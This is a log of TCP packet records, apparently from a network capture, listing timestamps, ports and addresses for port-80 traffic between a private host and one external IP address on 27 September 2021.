Sep 27, 2021 14:04:14.338939905 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338958979 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338958979 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.338965893 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.338989973 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339073896 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339090109 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339106083 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339129925 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339137077 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339145899 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339154959 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339164019 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339179039 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339184999 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339195013 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339198112 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339214087 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339226007 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.339226961 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.339257956 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.341573954 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343641043 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343679905 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343688011 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343698025 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343713045 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343713999 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343729973 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343733072 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343750000 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343771935 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343841076 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343858957 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343889952 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343899965 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343914986 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343939066 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343956947 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343969107 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.343977928 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.343985081 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344016075 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344018936 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344049931 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344057083 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344063044 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344083071 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344090939 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344125032 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344130993 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344178915 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344185114 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344202995 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344208956 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344234943 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344238997 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344285011 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.344338894 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.344371080 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.349610090 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.688812971 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.688890934 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.689971924 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.689995050 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.690007925 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.690041065 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.690066099 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.690066099 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.690090895 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.690095901 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.690114975 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.690119028 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.690139055 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.690143108 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.690162897 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.690201044 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.691914082 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.691951036 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.691972971 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.691982985 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.692001104 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.692019939 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.692058086 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692084074 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692104101 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.692107916 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692131042 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692169905 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692214966 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692238092 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692274094 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692296028 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692361116 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692388058 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692413092 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692435980 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692481041 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692532063 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692554951 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.692580938 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702095985 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702120066 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702124119 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702126026 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702130079 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702131987 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702135086 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702137947 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702141047 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702142954 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702146053 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702150106 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702152014 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702156067 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702158928 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702161074 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702163935 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702212095 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702244997 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702264071 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702280045 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702296972 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702313900 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702332973 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702351093 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702368975 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702387094 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702410936 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702428102 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702444077 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702445030 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702461958 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702491045 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702497959 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702502966 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702508926 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702528954 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702531099 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702538967 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702544928 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702554941 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702564955 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702578068 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702581882 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702598095 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:14.702601910 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702634096 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.702682972 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:14.703366995 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.039397955 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039433002 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039446115 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039463043 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039482117 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039514065 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039546013 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039613962 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.039648056 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.039673090 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.039700031 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.040560961 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.040628910 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.040652037 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.040673971 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.040682077 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.040735006 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.040755033 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.040802956 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.042340994 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051388025 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051420927 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051434040 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051446915 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051461935 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051476002 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051491976 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051510096 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051544905 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051554918 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051577091 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051592112 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051597118 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051630020 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051651955 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051670074 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051687002 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051688910 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051706076 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051723957 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051765919 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051784992 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.051803112 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.051817894 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.052714109 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054191113 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054218054 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054229021 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054250956 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054267883 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054287910 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054289103 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054301977 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054305077 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054320097 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054322958 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054342031 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054343939 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054357052 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054358959 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054371119 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054378033 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054384947 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054399967 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054406881 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054419994 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054430962 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054436922 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054450035 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054454088 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054462910 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054472923 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054483891 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054488897 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054496050 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054507017 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054517984 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054523945 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054527044 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054544926 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054553032 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054563999 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.054579020 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.054591894 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.055392981 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.432547092 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.432701111 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.432720900 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.432776928 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.432811975 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.433186054 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.433213949 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.433232069 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.433248043 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.433264017 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.433293104 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.433321953 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.434915066 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.434986115 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.435054064 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.435101032 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.435154915 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.435201883 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.435235023 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.435283899 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.436625957 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.445977926 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446007967 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446052074 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446069956 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446088076 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446104050 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446114063 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.446120977 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446136951 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.446156025 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.446181059 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.447280884 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447304964 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447320938 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447340012 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447351933 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.447357893 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447375059 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447386980 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.447391033 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.447417974 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.447447062 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.449384928 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450431108 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450460911 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450467110 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450479984 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450505018 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450508118 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450544119 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450548887 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450567961 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450587988 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450599909 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450666904 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450684071 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450700045 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450704098 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450715065 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450733900 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450839043 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450866938 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450877905 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450886011 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450920105 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450925112 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450933933 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450952053 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450953007 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450968981 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.450989962 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.450990915 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.451004982 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.451010942 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.451020002 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.451028109 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.451047897 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.451049089 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.451061010 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.451081991 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.451195002 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.451230049 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.451247931 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.451282024 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.452495098 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.780766010 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.780797005 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.780846119 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.780931950 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.780947924 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.780962944 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.780966997 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.780997992 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781003952 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781049967 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781068087 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781116962 CEST	80	49165	180.214.239.85	192.168.2.22
